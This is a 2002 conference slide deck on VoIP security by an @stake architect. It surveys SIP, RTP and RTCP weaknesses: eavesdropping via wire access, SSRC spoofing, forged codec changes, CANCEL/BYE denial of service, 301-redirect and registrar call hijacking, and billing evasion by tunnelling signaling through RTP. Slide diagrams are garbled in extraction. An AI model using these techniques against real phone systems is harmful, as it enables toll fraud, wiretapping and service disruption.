VoIP

The Next Generation of Phreaking

Revision 1.1

Ofir Arkin
Managing Security Architect
 ©2002 @STAKE, INC.

Agenda

 Overview

 An Introduction to VoIP

 Challenges Facing VoIP and their relation to Security

 Media Transport - Examining RTP, RTCP and Security

 Signaling – The Session Initiation Protocol as an example

 “What a call worth If you can’t speak Mr. Anderson?”

Examples with VoIP and Security

2
 ©2002 @STAKE, INC.

Overview

“...It is no longer necessary to

have a separate network for
voice...”
The fact that IP is the vessel for voice
transmission, inherits the security problems that
comes along with the Internet Protocol.
The security hazards are even more complex
because of the nature of speech (voice quality),
and other special conditions the VoIP technology
needs to meet in order to fulfill its promise as a
new emerging technology for carrying voice. 3
 ©2002 @STAKE, INC.

Overview
Some security issues arise from Media Transport
protocols (RTP, RTCP, SCTP) being used to carry
voice, some security issues arise from Signaling
protocols (SIP, H.323, MEGACO, MGCP) and their
respected architecture (the placement of the
“intelligence”, as an example) which are being
used, and other issues arise from the different
components that combine a VoIP architecture. We
will also examine supporting protocols, such as
Quality of Service (QoS) protocols. We can even
name physical security as another source for
concern.
VoIP has a wide range of deployment
scenarios, hence a wide range of security
problems reflecting these scenarios. 4
 ©2002 @STAKE, INC.

A Definition of VoIP
We can define VoIP simply as “the transport
of voice traffic using the Internet Protocol”.
Stating “using the Internet Protocol”
associates the usage of the Internet in the
mind of many people. But the matter of fact is
that Internet Telephony is only a portion of
VoIP, and VoIP has a broader definition. To
remove any shreds of a debut we define VoIP
as “the transport of voice traffic using the
Internet Protocol utilizing any network”.

5
 ©2002 @STAKE, INC.

Protocols Combining a VoIP Solution

Protocol Types:

 Signaling – Protocols in which

Establish, Locate, Setup, Modify and
Teardown sessions.

 Media Transport – Protocols which

transmit the voice samples.

 Supporting (Services) – DNS, Location

Servers, QoS, Routing Protocols, AAA… 6
 ©2002 @STAKE, INC.

Protocols Combining a VoIP Solution

The Location Service is

being queries to check that
DNS Server the destination IP address
DNS Query for
represents a valid registered
the IP Address of
device, and for its IP Address
the SIP Proxy of
the Destination Location Service
2 Domain The INVITE is 4
forwarded
3
A request is sent SIP Proxy
(SIP INVITE) to
ESTABLISH a 5
session The request is forwarded to
SIP Proxy the End-Device
1 SIP IP Phone
6

Media Transport
Destination device returns
its IP Address to the
SIP IP Phone originating device and a
7
media connection is opened
 ©2002 @STAKE, INC.

Examples for Protocols Combining a VoIP Solution

– It is a Zoo Station
Signaling
 SIP (IETF)
 H.323 (ITU-T)
 MGCP (IETF)
 MEGACO

Media Transport
 RTP and RTCP (IETF)
 SCTP (IETF)

Supporting Services
 DNS
 Routing - TRIP (Telephony Routing over IP)
 Quality of Service – RSVP, 802.1q
8
 ©2002 @STAKE, INC.

Why Replacing the Current Infrastructure of

Two separate reasons:
Telephony? – A Carrier Perspective
- Technology is Advancing: Circuit switching is not
suitable to carry anything else than voice, it does
not qualify as a suitable technology for the new
world of multimedia communications (Video,
Email, Instant Messaging, the World Wide Web,
etc.). Traditional Telephony cannot provide, for
example, the types of features that are needed by
a contemporary business in the advancing age of
e-Commerce.
- The $ Factor

Subscribers would still like to use the telephone for

making and receiving phone calls, but they would
also like to have the ability to use the telephone to 9

interact easily with other applications, and to

easily use new services.
 ©2002 @STAKE, INC.

Why IP? Carrier Perspective – Lower Equipment Costs

Traditional Telephony:

 Proprietary hardware, application software

and operating system when purchasing a
telephony switch.
 One Vendor usually supplying the entire
equipment for the whole network
 The Vendor will also supply with training
support and future development for its
equipment. This will bind the operator with
the supplier for a long term of time, since it is
not cost effective to replace the equipment. It
will also limit the opportunities for 3rd parties 10

to develop new software applications for these

systems.
 ©2002 @STAKE, INC.

Why IP? Carrier Perspective – Lower Equipment Costs

IP:

 In the IP world most of the equipment is

standard computer equipment which is mass
produced. This offers great flexibility for the
purchasing party. One company can supply
the hardware, another can supply the
operating system, and another can develop
special features. Several companies can be
hired to supply different systems for the
network.

 Because of the distributed client server 11

architecture of IP, operators have the ability to

start small and grow.
 ©2002 @STAKE, INC.

Why IP? Carrier Perspective – Lower bandwidth

requirements
Unlike traditional telephony that is limited to the
usage of the ITU recommendation G.711 based
codec, and therefore transport voice at the rate
of 64kbps, VoIP can use other sophisticated
coding algorithms that will enable speech to be
transmitted at speeds such as 32kbps, 16kbps,
8kbps, 6.3kbps, or even 5.3kpbs. Some VoIP
based protocols are also able to negotiate an
accepted coder scheme to be used, enabling the
usage of more than one coder scheme and the
ability to introduce new coders in the future.
Taking into account that a large portion of a
carrier’s operational costs is it’s transmission 12

capabilities, VoIP can significantly reduce

bandwidth requirements to as little as one-eighth
 ©2002 @STAKE, INC.

Why IP? Carrier Perspective

 More business opportunities and revenue

potential
 “Show me the money Jerry!”
 Introducing new services to Telephony
subscribers
 The time-to-market of new services
 New Technology brings new comers to the
market (good?)
 Integrating Voice and Data applications

13
 ©2002 @STAKE, INC.

Why IP? User Perspective – Corporate Users

One of the fastest growing markets for VoIP is

the enterprise LAN. More and more enterprise
LANs are carrying both Voice, Video and Data.

More and more large organizations, especially in

North America, are using IP based dedicated
leased lines between different branches of the
company to carry not only data but voice and
video. Using this way, these companies are
saving the costs of long distance calls using
traditional telephony. The leased lines can also
be used for video conferencing and for other
usages that will bring significant cost savings for 14

an organization.
 ©2002 @STAKE, INC.

Why IP? User Perspective - Consumers

Consumers might have several other reasons behind
the usage of IP to carry voice, rather than a Carrier
Grade Telephony Operator, or a corporate user.

Lower Bandwidth Requirement – VoIP can use

several sophisticated coding algorithms that will
enable speech to be transmitted at speeds such as
32kbps, 16kbps, 8kbps, 6.3kbps, or even 5.3kpbs.
VoIP based protocols are able to negotiate an
accepted codec scheme to be used, enabling the
usage of more than one coder scheme and the ability
to introduce new codecs in the future. These abilities
present the End-User of the ability to use the Internet
and VoIP technology to make voice conversations 15
with any other PC User connected to the Internet. This
is also one of the usages of Internet Telephony.
 ©2002 @STAKE, INC.

Why IP? User Perspective - Consumers

Significant Cost Savings - For consumers the
introduction of VoIP not only brings more added value
services when they use their telephone. It also brings
the opportunity to have significant cost savings in the
cost of phone calls. Today consumers can use an
ordinary telephone to connect to an Internet
Telephone Service Provider (ITSP).

The ITSP is using IP to provide low cost Voice/Fax

connections through combinations of the Internet,
leased lines, and the PSTN. All the ITSP has to do is to
use an equipment to convert the voice to data,
transport the data, and convert it back to voice. The
cost reduction for the ITSP comes from the usage of 16
the Internet as the voice transport vessel. The ITSP
does not have to build a full blown telephony
 ©2002 @STAKE, INC.

Why IP? User Perspective - Consumers

ITSPs also connect PC users to traditional

telephony users. Here the costs savings are even
more considerable both to the ITSP and for the
consumer (the ITSP is not required to pay for
interconnect from the User side). Using such an
ITSP service can reduce phone call costs
considerably.

For example, on calls made between the United

Kingdom to Israel instead of paying 1.7GBP per
minute with traditional telephony, paying only
0.055GBP per minute when using an ITSP.
17
 ©2002 @STAKE, INC.

Challenges Facing VoIP

 Speech Quality

 Delay/Latency
 Jitter
 Packet Loss
 Speech Coding Techniques

 Network Availability, Reliability and Scalability

[Carrier]
 Managing Access and Prioritizing Traffic
[Carrier]
 Security [All]
18
 ©2002 @STAKE, INC.

Problems Facing VoIP – Speech Quality

Speech quality is affected by many different

technical attributes. We can name, for example,
the codec used, system latency, jitter, packet
loss, and other.

Usually the codec chosen will be an industry

standard. Therefore latency becomes one of the
most important attribute affecting voice quality.

19
 ©2002 @STAKE, INC.

Problems Facing VoIP – Speech Quality

Latency/Delay
With VoIP we define latency as the interval it
takes speech to exit the speaker’s mouth and
reach the listener’s ear. This definition is also
known as “one way latency” or “mouth-to-ear
latency”. Typically latency is measured by
milliseconds. The sum of the two one-way
latency figures is also known as the round trip
latency. ITU-T recommendation G.114 specifies
that in order to have a good quality of voice, the
round-trip delay should not exceed 300ms.

20
 ©2002 @STAKE, INC.

Problems Facing VoIP – Speech Quality

We can name several reasons for delay with VoIP

that are inherited from the usage of IP based
networks:

 Packetization/Voice Coding and Transmission

Delay – The time
it takes to pack and send a voice sample.
 Handling Delay – The time it takes to
process a packet.
 Queuing Delay – The time it takes to be
queued.
 Convergence Delay – The time it takes to
convert VoIP based 21

traffic to its PSTN equivalent and vise versa.

 ©2002 @STAKE, INC.

Problems Facing VoIP – Speech Quality: Jitter

We can define jitter as delay variation. If we

experience a delay in a conversation, there are
methods to adjust this delay, provided that the
delay is not too big. If the delay varies than
adjusting the delay becomes a harder task.

22
 ©2002 @STAKE, INC.

Problems Facing VoIP – Speech Quality: Packet

Loss
In order to have a high speech quality we need that
little to none of the speech samples being transmitted
from the speaker to the listener will be lost. However,
with data networks it is expected, and common, to
have packet loss. One of many reasons might be a
congest network, and so on.

With voice, we cannot use traditional retransmission

mechanisms when packets are lost, since voice is
delay sensitive. These retransmission mechanisms
will introduce additional latency to the process (UDP
vs. TCP). Time is needed to determine that a packet
was lost, and time is needed to retransmit the missing
packet. 23

With VoIP we can suffer packet loss up to 5% of the

 ©2002 @STAKE, INC.

Problems Facing VoIP – Speech Quality: Packet

Loss
Packet loss may affect codecs differently, since
codecs compress the audio data in different
ways. A codec which do little compression will
loose a smaller portion of the audio compared to
a codec which is using an advanced compression
scheme to use less bandwidth. Therefore the
affect on the voice quality will also be different.

Another problem we can raise is the out of

sequence arrival of voice sample carrying
packets. We need to ensure that speech is
received at the other end as transmitted.
Otherwise packets will be presented to the 24
listener out-of-order, or discarded…

A way to deal with some of these problems is the

 ©2002 @STAKE, INC.

Problems Facing VoIP – Speech Quality: Speech

Coding Techniques
If speech sounds synthetic, the latency
prevention, bandwidth reduction and packet loss
minimization techniques will be useless. The
speech coding technique selected should reduce
bandwidth while still maintaining a good quality
of speech. We can make a rough statement and
claim that the lower the bandwidth requirements
of a certain codec, the lower the voice quality
produced. Also, a better voice quality is usually
using a more complex algorithm and therefore
more processing power is needed.

This does not mean that there are no codecs 25

which produce a good quality of speech without

high bandwidth requirements.
 ©2002 @STAKE, INC.

Voice Quality with Internet Telephony

With Internet Telephony voice quality issues

are the most problematic to overcome. The
problem is that the Internet is not a network
where one can prioritize traffic or preserve
bandwidth. We can name packet loss,
congestion, delays, and reliability as other
venues of troubles for voice quality, which
adds to the overall problem of voice quality
with Internet Telephony.

We need not forget that with the Internet,

which is a packet switched network, packets 26

may take different routes to a destination.

This means that voice samples may arrive
 ©2002 @STAKE, INC.

Problems Facing VoIP – Network Availability,

Reliability and Scalability
Carrier Grade Telephony networks are available
99.999% of the time. This means a downtime of only
5 minutes per year. Carrier Grade Telephone
operators who wish to rely on VoIP based technology
to offer telephony services are required to have the
service available exactly as it is today – 99.999% of
the time. Every time you will wish to use your VoIP
based telephony service, you will have to have a
service when picking up the telephone’s handset (a
dial tone and the ability to complete a call).

The VoIP core network is required to be resilient and

redundant. For other parts of the network, it depends
on the network architecture and infrastructure. There 27
are numerous problems of availability at the edge of
the network. These problems relate to the way the
 ©2002 @STAKE, INC.

Problems Facing VoIP – Network Availability,

Reliability and Scalability
A Carrier Grade VoIP network is required to be
scalable and to support hundred of thousands of
concurrent connections/calls as it is today with circuit
switched telephony networks. A VoIP based network
also needs to maintain the ability to grow with
demand and to be scalable. As was mentioned in
previous sections, a VoIP based network is able to
start small and expend as demand for bandwidth and
Gateway
a/b
POTS

service increases. 100BaseT a/b

Fax
IP
100BaseT Switch a/b

Modem

100BaseT
PC

28
 ©2002 @STAKE, INC.

Problems Facing VoIP – Network Availability,

Reliability and Scalability

29
 ©2002 @STAKE, INC.

Problems Facing VoIP – Managing Access and

Prioritizing Traffic
With VoIP based networks Voice, Data, and Video
share the same network. Voice and Data has their
own quality requirements, and must not be treated
the same way within the network.

Bandwidth must be preserved to Voice, so whenever

a subscriber wishes to place a call he will be able to
do so, and the appropriate bandwidth will be assigned
to its call. If large data transfers occur at the same
time, priority must be given to the voice traffic over
the data traffic. So voice traffic will not be queued
back, and latency and packet loss will occur. This
means that the most critical traffic, voice, will not be
affected from a congested network. 30

In order to be able to prioritize traffic and reserve

bandwidth VoIP based networks will have to use
 ©2002 @STAKE, INC.

Problems Facing VoIP – Security

The wide availability of IP does not only

contribute to the VoIP technology widespread,
but also inherits the security hazards along with
it.
The fact that data and voice share the same
network is the root of some of the security
problems associated with VoIP. The fact that IP is
the vessel for voice transmission, inherits the
security problems that comes along with usage
of the Internet Protocol. The security hazards are
even more complex because of the nature of
speech within VoIP networks, and other special
31
conditions VoIP needs to meet. We can mention
resource starvation attacks, session hijacks, and
 ©2002 @STAKE, INC.

Problems Facing VoIP – Security

Old school security problems are not the only

security problems which VoIP is facing. Some
security issues arise from media transport
protocols being used to carry voice, some
security issues arise from signaling protocols and
their respective architectures (the placement of
the “intelligence”, as an example) which are
being used, and other issues arise from the
different components that combine a VoIP
architecture. Even supporting protocols, such as
quality of service protocols have their security
issues. We can even name physical security as
another source of concern. 32
 ©2002 @STAKE, INC.

Problems Facing VoIP – Security

We need not to forget another major factor which

is the fact that signaling and voice are sharing
the same networks. Because most of the VoIP
based signaling protocols are used in-band,
another venue for trouble is opened.

VoIP has a wide range of deployment scenarios,

hence a wide range of security problems
reflecting those scenarios.

33
 ©2002 @STAKE, INC.

Problems Facing VoIP – Security

Another concern with VoIP based networks is that an end-
user maintains the ability not only to place a call, and
interact with his own switch, but has the ability to interact
with some other parts of the infrastructure as well. This
includes other networking devices combining the network,
protocols being used whether media transport protocols or
signaling protocols, the TCP/IP protocol suite, etc.

Some of the VoIP based protocols gives an end-user a

broader options to interact with the network, not only using
features, but also because the intelligence is at the edge
(the telephone itself).

Those risks put in danger network availability, and voice

quality. Not even mentioning other issues such as fraud,
34
and phreaking.

There are a lot of constraints a carrier grade VoIP based

 ©2002 @STAKE, INC.

VoIP Security – What is at stake?

Everything…

From IP Phones to Core Routers through Media

Gateways, SIP Proxies, Gatekeepers, Location
Servers, Routers, Switches, VoIP based Firewalls…

Any Equipment combining a VoIP infrastructure of

some sort.

Any Protocol used whether a signaling protocol (SIP,

H.323, MEGACO, MGCP) or used to carry the voice
samples (RTP, RTCP). Taking advantage of the
protocols themselves is in my opinion the name of the
game. 35

Any TCP/IP protocol used

 ©2002 @STAKE, INC.

VoIP Security – Physical Security

With a 4th Generation Carrier the Last-Mile is the

main concern:

 The main concern is with Access to the

Physical Wire (and
to equipment). If achieved all is downhill
from there
(this holds true for any architecture using
VoIP as well).

 Equipment is likely to be stolen

Routers and switches are nice decorations
for a room. 36

 Physical Tempering - “Cut the cord Luke”

 ©2002 @STAKE, INC.

VoIP Security – Physical Security

Voice Packet Shaping for QoS (DiffServ)

Data

Voice
My Hub (is your Hub)

Data
By passing si mple pack et shap ing
mec hanisms.
Get ting int o t he Voi ce VL AN: End -of - 37
Gam e.
 ©2002 @STAKE, INC.

VoIP Security – Physical Security

100BaseT 100BaseT
PC

100BaseT Switch 100BaseT Hub 100BaseT

IP Phone

100BaseT 100BaseT
PC

100BaseT Switch 100BaseT Switch 100BaseT

IP Phone

Eavesdropping can be done easily if there is access to the

wire, with no specialized equipment other than a hub, a
knife, and a clipper.
-Between the IP Phone (or Customer Premises
Gateway) and the Switch
-Between two switches 38

With both scenarios we bypassed any QoS mechanism

used.
 ©2002 @STAKE, INC.

VoIP Security – Physical Security

Free Phone Calls

I a m represent ing
the p hys ical ad dress I am rep resent ing
of the IP Phone the p hy si cal a ddress
of the Swi tch

An “Advantage” Over Phreaking of this sort because the

eavesdropper can also have free calls without the
knowledge of the subscriber…

Using Call-ID to differentiate between calls destined to the 39

phreaker to the calls destined to the owner of the line.

 ©2002 @STAKE, INC.

VoIP Security – Availability

 Availability & Redundancy

 No Electricity No Service.
“G, here goes our Carrier Grade
availability…”

 Costs of redundancy, and UPSs for every

switch and router at the
last mile…

 Denial-of-Service - Even more easy with

VoIP, since you
really do not need to be that smart and use 40

too much
traffic, but still you can cause outage in the
 ©2002 @STAKE, INC.

VoIP Security – Availability

To perform a denial-of-service you might use several
venues:

 Flood (G what is new with that?)

 Abuse the protocols themselves – Introduce
denial-of-service
conditions taking advantage over the protocols
used to do VoIP
(examples later).

The type of devices one might target are, for example:

 IP Phones (Easy)
 Routers, Switches (depends on the equipment)
 Signaling Gateways, Media Gateways, SIP
41
Proxies…
(Easy-Medium)
 Any device in the path a call takes from a
 ©2002 @STAKE, INC.

Media Transport – RTP

0 4 8 16 31

4 bit
4 bit
Us ed b y a re ceiver Version
Header
Length
8-bit type of service 16-bit total length ( in bytes )

to de tect p acket 3 bit

16-bit identification 13-bit Fragment Offset
loss (als o can be Flags

used to res tor e 8-bit time to live

8-bit protocol 16-bit header checksum 20 bytes
( TTL )
pack et se quence).
32-bit source IP address

Ind icates the instant at 32-bit destination IP address

which the f irs t b yte i n the
RTP p ayl oad was g enera ted. Options ( if any )

The ti mestamp is us ed to
16-bit Source Port 16-bit Destination Port
pla ce R TP pack ets i n a 8 bytes
co rre ct timing o rder 16-bit UDP Length 16-bit UDP Checksum

V P X CC M PT Sequence Number

Timestamp
Identifie s the
so ur ce o f an SSRC

RTP s tream
CSRC

42
 ©2002 @STAKE, INC.

Media Transport – RTP Security Issues

 Denial of Service

 The Way RTP Handles SSRC Collisions

 Sending command using SSRC of another
participant of a session.
Result – The ability to drop users from a certain
session

 Claiming SSRC of a user

Result: Transmission will stop, new selection of
SSRC needs to
take place and the transmission should resume.

 Why shutdown when we can have some fun? – Same

SSRC, higher
43
sequence number, higher timestamp. The fake
content will be played
before the real one. This means that from now on we
 ©2002 @STAKE, INC.

Media Transport – RTP Security Issues

 Dodge this - Changing of audio encoding during a

session. This can be
used to temper with Voice Quality, either using a low
quality codec, or
using a higher quality codec that will jam the pipe.

 Encryption

 DES – Breakable (like other technologies and

products…)

 If SIP is used the DES Key is sent in the clear

with SDPs 44

“k” parameter…
 ©2002 @STAKE, INC.

Media Transport – RTP Security Issues

Mix This You Foo (Tricking “Mixers” to mix whatever from
wherever)

64kbps 128kbps 64kbps 64kbps

Mixer Mixer
128kbps 128kbps 64kbps 64kbps

Differe nt l ink sp ee ds conne ct ed Too much to ha ndle for one I P

to a confer ence Pho ne whe n r eceivi ng traff ic
fro m 3 so urce s a t 64kbps
45
 ©2002 @STAKE, INC.

Media Transport – RTP Security Issues

 Changing a used codec in the middle of
the session – sometimes happens automatically
when the network suffers from congestion. By
forging a voice codec change, not only reducing
quality of voice, it might also introduce other
problems as denial-of-service, crash of end
systems, etc.

 Eavesdropping – Since RTP identifies the

codec being used (statically) or either using a
“dynamic” identified codec it is easy to
reconstruct the voice sampling (even in real
time). 46
 ©2002 @STAKE, INC.

Media Transport – RTCP Security Issues

 Forging Reception Reports

 Reporting more Packet Loss – Might lead to

the usage of a
poor quality codec with an adaptive system.
 Report more Jitter - Might lead to the usage
of a poor
quality codec with an adaptive system.

 Denial of Service

 RTCP “BYE”, not in sync with the Signaling

protocol. 47

The Signaling protocol is not aware that

 ©2002 @STAKE, INC.

SIP (Session Initiation Protocol)

“The Session Initiation Protocol (SIP) is an

application-layer control (signaling) protocol for
creating, modifying and terminating sessions
with one or more participants. These sessions
include Internet multimedia conferences, Internet
telephone calls and multimedia distribution.
Members in a session can communicate via
multicast or via a mesh of unicast relations, or a
combination of these”.

Taken from RFC 2543

48
 ©2002 @STAKE, INC.

SIP Design & Methods

 A client-server based protocol modeled after HTTP
 Building Blocks are Requests and Responses
Request
 The Methods are:
Clinet Server
Response

 INVITE – Session Setup

 Initiate Sessions
 Re-INVITEs used to change session state
 ACK – Confirms INVITE sessions
 BYE – Terminate Sessions
 CANCEL –Pending session cancellation
 OPTIONS – Capability and options Query
 REGISTER – Binds Address to Location

49
 ©2002 @STAKE, INC.

SIP Components
SIP UAC – SIP User Agent Client

SIP UAS – SIP User Agent Server

UA – UAC + UAS

SIP Proxy – Relays the Call Signaling without maintaining a

state (although able to). Receives a request from a UA or
another Proxy Server, and forwards or proxies the request
to another location (The ACK and BYE are not required to
go through the SIP Proxy Server).

SIP Redirect – Receives a request from a UA or a Proxy. The

Redirect Server will return a 3xy response stating the IP
address the request should be sent to.
50
SIP Registrar – Receives Registration requests, and keeps
the user’s whereabouts using a Location Server.
 ©2002 @STAKE, INC.

SIP Response Codes

Characteristics similar to HTTP:

1xy Information or Provisional (Request in
progress but not yet completed):
 100 Trying
 180 Ringing
 181 Call Forwarded
2xy Success (the request has completed
successfully):
 200 OK
3xy Redirection (another location should be tried
for the request):
 300 Multiple Options
 301 Moved Permanently 51

 302 Moved Temporarily

 ©2002 @STAKE, INC.

SIP Response Codes

4xy Client Error (due to an error in the request,

the request was not completed . Can be retried
at another location):
 400 Bad Request
 401 Unauthorized
 482 Loop Detected
 486 Busy Here
5xy Server Failure (the request was not
completed due to error in recipient. Can be
retried at another location):
 500 Server Internal Error
6xy Global Failure (request was failed and should
not be retried again): 52

 600 Busy Everywhere

 ©2002 @STAKE, INC.

SIP Architecture
DNS Server
The Location Service is
being queries to check that
the destination IP address
DNS Query for
represents a valid registered
the IP Address of
device, and for its IP Address
the SIP Proxy of
the Destination Location Service
Domain SIP Proxy
VITE
FW: SIP IN
100 Trying
g
180 Ringin FW
:S
200 OK 18 IP
0R IN
E ACK 20 ing VI
IT T
V
IN ing g SIP Proxy AC 0 OK ing E
P ry K
SI T in
0 0 i ng
1 R K
8 0 O K
1 0
20 AC
SIP IP Phone
RTP Media
Both Way
BYE
200 OK
53
SIP IP Phone
 ©2002 @STAKE, INC.

SIP Security – INVITE Example

INVITE sip:UserB@there.com SIP/2.0
Via: SIP/2.0/UDP here.com:5060
From: BigGuy <sip:UserA@here.com>
Predicted Values
To: LittleGuy <sip:UserB@there.com>
Call-ID: 12345601@here.com
Another hard to
CSeq: 1 INVITE guess value
Contact: <sip:UserA@100.101.102.103>
Content-Type: application/sdp
Content-Length: 147

v=0
o=UserA 2890844526 2890844526 IN IP4 here.com
s=Session SDP
c=IN IP4 100.101.102.103
t=0 0
m=audio 49172 RTP/AVP 0
a=rtpmap:0 PCMU/8000 54
 ©2002 @STAKE, INC.

SIP Security – Denial-of-Service

 Simple Denial-of-Service against SIP
when Using UDP
Since UDP is asynchronous protocol, if one can
guess the target network a caller is sending
its SIP signaling over UDP to, sending an ICMP
Error Message such as Port Unreachable,
Protocol Unreachable, Network Unreachable or
even Host Unreachable will terminate the
signaling and the call in any state.

 Using “CANCEL”s (see next 2 examples)

 Using “BYE” (anytime) 55

 ©2002 @STAKE, INC.

SIP Security – Denial-of-Service

A is not making calls

B: SIP IP Phone
ITE
INV

EL
NC
CA
A: SIP IP Phone

C:Attacker

“The CANCEL request cancels a pending

request with the same Call-ID, TO, From, and 56

Cseq…”
 ©2002 @STAKE, INC.

SIP Security – Denial-of-Service

A is not receiving calls

B: SIP IP Phone
ITE
INV

CANCEL

A: SIP IP Phone

C:Attacker

57
 ©2002 @STAKE, INC.

SIP Security – Call Tracking

Defined as logging of the source and destination of all
numbers being called.

Capturing the DTMF among all the other voice traffic

one will capture, will give the eavesdropper
sometimes more information that can range from
voice mail passwords (voicemail system number,
mailbox number, and password), calling card
information, credit card information, or any other data
entered using DTMF.

With SIP we need to track the INVITE message. It will

contain the source and destination of the call (With
H.323 the H.225 call setup message which initiate a 58
call, has the call source and call destination as part of
the message). You can also log the time of the call,
 ©2002 @STAKE, INC.

SIP Security – Call Tracking (Example)

INVITE sip:UserB@there.com SIP/2.0
Via: SIP/2.0/UDP here.com:5060
From: BigGuy <sip:UserA@here.com>
To: LittleGuy <sip:UserB@there.com>
Call-ID: 12345601@here.com
CSeq: 1 INVITE
Contact: <sip:UserA@100.101.102.103>
Content-Type: application/sdp
Content-Length: 147

v=0
o=UserA 2890844526 2890844526 IN IP4 here.com
s=Session SDP
c=IN IP4 100.101.102.103
t=0 0
m=audio 49172 RTP/AVP 0
a=rtpmap:0 PCMU/8000 59
 ©2002 @STAKE, INC.

SIP Security – Call Hijacking

INVITE is sent, the attacker sending a 3xy

message indicating that the called party has
moved, and will give his own forwarding
address.

B: SIP IP Phone
ITE
INV

301 Mo
ved Pe
r manen
tly
INVIT
E’
A: SIP IP Phone

C:Attacker
60
 ©2002 @STAKE, INC.

SIP Security – Call Hijacking

Registering address instead of other.

[If requires authentication might use another
type of attack]SIP Registrar

I am user A and here is

my IP Address

A: SIP IP Phone

C:Attacker
61
 ©2002 @STAKE, INC.

SIP Security – SIP Authentication

Two Ways:
 UA to UA
 UA to Proxy/Registrar

Authentication Mechanisms:
 Basic
 Digest
 PGP (not any more)

Challenge Response Based

Responses can also be

authenticated although not
widely used
62
 ©2002 @STAKE, INC.

SIP Security – SIP Authentication

When using Digest

authentication one might
use a reflection attack to
gain unauthorized access to
the network.

A different secret is needed

to be used in each direction

63
 ©2002 @STAKE, INC.

SIP Security – Encryption

 Is not a magic solution for everything.

 Signaling Encryption is “designed” to hide

information from
eavesdroppers. But still some information needs
not to be
hidden.

 The other end might be able to see all the

routing information
and send it back to the caller (G, here goes
another bright idea
to the toaster).
64
 ©2002 @STAKE, INC.

SIP Security – Encryption – Hide the Route Luke

SIP Proxy

SIP Proxy

IP Phone B
SIP Proxy

SIP Proxy

IP Phone A Targ et – Hi de t he rou ting i nformat io n (vi a head er)

Pro blem – IP Pho ne B w ill need to ro ut e back to IP
Phone A. W ill be a ble to see al l ro uti ng i nfor mat ion
65
befo re it send s resp onses to his loc al p roxy.
 ©2002 @STAKE, INC.

SIP Security – Encryption

 It consumes time, and introducing another delay.
Problem will
be when users will be over charge for calls for
the small delay it
will introduce.

 Law enforcement agencies will not permit this in

a carrier, since
they need to perform wiretapping, which is
another criterion in
being a carrier (the conversation will not be
encrypted at least in
part of it’s traversal).
66
 ITSPs cannot encrypt – Over Delays
 ©2002 @STAKE, INC.

SIP Security – Signaling & Media Transport

One of the functions of an H.323 gatekeeper is to
provide authorization for each call to proceed. One
of the authorization parameters is a parameter
called allowed bandwidth which dictates to the
H.323 terminals what is the bandwidth the
gateway will allow them to use without sending a
bandwidth request to the gatekeeper.

SIP is using the same codecs as H.323, since they

both use RTP and RTCP. SIP is able to throttle the
sending rate in order to deal with network
congestions, but it does not have a provisioning
function like H.323 have with its gatekeeper.
Therefore SIP is not able to control the bandwidth 67
used for the call. This also suggests that RTP and
RTCP take more liberty with SIP based
 ©2002 @STAKE, INC.

SIP Security – Signaling & Media Transport

This means for example that with SIP not only

we can make the line congested, we can also
fake reports, or even switch to another
bandwidth consuming codec that will not fit
the link between the two ends, and therefore
its usage will raise the packet loss – and we
will have a lower quality, or even a poor
quality of voice.

SIP is not aware what happens at the Media

Transport layer. This means that if we change
the codec we are using through RTP, SIP will
not be aware of this. 68
 ©2002 @STAKE, INC.

SIP Security – Fooling Billing

SIP Proxy server is usually the one which is
producing Call Detail Recording (CDR) for billing.
This is because the SIP Proxy server is able to
force all the signaling an end point is sending to go
through the SIP Proxy server. This means that
setup and tear-down signaling messages will go
through the SIP Proxy server, so CDRs will be
produced correctly.

In order to do so the signaling need to go through

the SIP Proxy. This is not true when we are dealing
with the actual transportation of the media. This
means that there is no provisioning on the
RTP/RTCP packets. 69
 ©2002 @STAKE, INC.

SIP Security – Fooling Billing

A simple way to fool this mechanism is to hide

the SIP signaling in RTP or in RTCP messages.
This of course suggests that both ends to the
communication will use modified applications
that will understand how to parse the
modified RTP/RTCP packets. One example for
a modified RTCP packet might be one with a
unique Packet Type field.

In this example case the SIP Proxy will not see

any signaling exchanged between the two
ends of the communication, although audio
will pass between both ends and a “call” will 70

proceed. Of course no billing information will

be available.
 ©2002 @STAKE, INC.

SIP Security – Fooling Billing

This example emphasis the need to

understand who comes first, the chicken or
the egg. In our case signaling comes first only
than we need to allow RTP packets to be
exchanged. This is a restriction which need to
be put in any VoIP system based on the SIP
protocol.

We can introduce this condition in a carrier

VoIP based network as well. This will cause a
total chaos
71
 ©2002 @STAKE, INC.

SIP Security – Thoughts

This means that:

 No user should be able to get to another

user (unless
calling him).
 The Default Gateway needs to be your local
SIP Proxy (or
who ever it is with your solution)
 No service will be available unless someone
is
authenticating (But you do not expect
people to
72
authenticate before using the service…).

Therefore it is more than a simple headache…

 ©2002 @STAKE, INC.

SIP and Firewalls – Just to Illustrate the Problem

Today not working that well with VoIP protocols.

Especially NAT introducing a lot of problems,

since IP addresses of source and destination
might be in different parts of a message (not only
in the IP header)

Signaling must control the opening of Media

Stream “holes” in the firewall. If not free phone
calls might take place. a.k.a. SIP Over RTCP/RTP
or any other Signaling over RTCP/RTP.

Who was first? The Signaling or the Media 73

Transport? The CANCEL or the INVITE? Etc.

 ©2002 @STAKE, INC.

SIP Security – Other Issues

 Intelligence at the End Point (There is no such thing as
“Trusting the
Client” or “Client Security”).
 Predicted information - Some of the field values
information is 100%
predicted accept for the call-id. Call-id needs to be
selected randomly, so
this will not be anticipated as well.

 Fraud – What about putting our own Neighborhood SIP

Proxy?

 Path the Signaling and Media Streams takes

 Supporting Protocols and Services

74
 QoS – DiffServ is easy to forge. 802.1q might follow
the same path.
 DNS
 VoIP
The Next Generation of Phreaking

Questions?

Ofir Arkin
Managing Security Architect